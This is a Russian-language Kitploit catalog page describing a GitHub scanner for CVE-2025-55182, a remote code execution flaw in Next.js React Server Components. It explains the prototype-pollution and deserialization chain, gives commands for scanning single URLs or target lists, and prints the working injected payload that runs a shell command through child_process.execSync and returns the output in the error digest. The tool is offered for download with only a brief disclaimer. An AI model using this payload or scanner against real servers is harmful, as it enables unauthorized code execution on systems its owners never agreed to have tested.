Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-Scanner — Сканер безопасности для CVE-2025-55182 - Критическая уязвимость RCE в React Server Components | Kitploit
Инструменты/GitHubGitHub/f0xyx/cve-2025-55182-scanner
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubf0xyx/cve-2025-55182-scanner

CVE-2025-55182-Scanner

Сканер безопасности для CVE-2025-55182 - Критическая уязвимость RCE в React Server Components

Репозиторий
139 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE‑2025‑55182 – Сканер RCE через десериализацию RSC в Next.js

Этот инструмент проверяет, уязвима ли цель для CVE‑2025‑55182 — ошибки удаленного выполнения кода, вызванной небезопасной обработкой полезных нагрузок модели RSC (React Server Components) внутри Next.js.
Уязвимость представляет собой цепочку Загрязнение прототипа → Злоупотребление десериализацией → Выполнение JavaScript на стороне сервера.

Отказ от ответственности: Используйте только на системах, которые вам законно принадлежат или на которые у вас есть явное разрешение. Несанкционированное тестирование = преступление, бро.


🔥 Как работает эта уязвимость

Next.js внутренне обрабатывает специальные объекты «model», отправляемые через multipart/form-data.
Если злоумышленник внедряет вредоносную структуру, например поддельный thenable, он может отравить:

  • __proto__
  • _response._prefix
  • constructor.constructor
  • и другие внутренние компоненты

Это приводит к тому, что сервер выполняет JavaScript, контролируемый злоумышленником, что приводит к полному RCE.


📌 Что делает этот скрипт

  • Принимает одиночный URL (-u) или список целей (-l)
  • Отправляет специально сформированную полезную нагрузку multipart/десериализации
  • Извлекает вывод команды (id) из дайджеста ошибки сервера
  • Сохраняет уязвимые хосты в foxvuln.txt

▶ Использование

Одиночный URL

python3 main.py -u https://target.com

Режим списка

python3 main.py -l list.txt

📦 Обзор полезной нагрузки

Полезная нагрузка злоупотребляет process.mainModule.require('child_process').execSync() через внедренный _prefix:

"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",

Это заставляет сервер выполнить id и выдать результат внутри выброшенного дайджеста (потому что ошибки RSC намеренно возвращают структурированное поле «digest»).


🧪 Пример вывода

Уязвимая цель:

[+] Testing: https://victim.com
[VULN] user : uid=1000(www-data)

Не уязвима:

[+] Testing: https://secure.com
[NOT VULN]

🗂 Файл вывода

Все подтвержденные уязвимые URL сохраняются в:

foxvuln.txt

Формат:

https://victim.com => uid=1000(www-data)

🧠 Примечания

  • Работает только на конечных точках, которые обрабатывают потоковые полезные нагрузки Next.js RSC
  • Не перебирает маршруты — предполагает, что хост обрабатывает POST на /
  • Тайм-аут установлен на 10 секунд на хост
  • Полностью безопасен для лабораторных сред — но не запускайте это на случайных серверах, если не хотите быстро получить уголовное дело
Скачать инструмент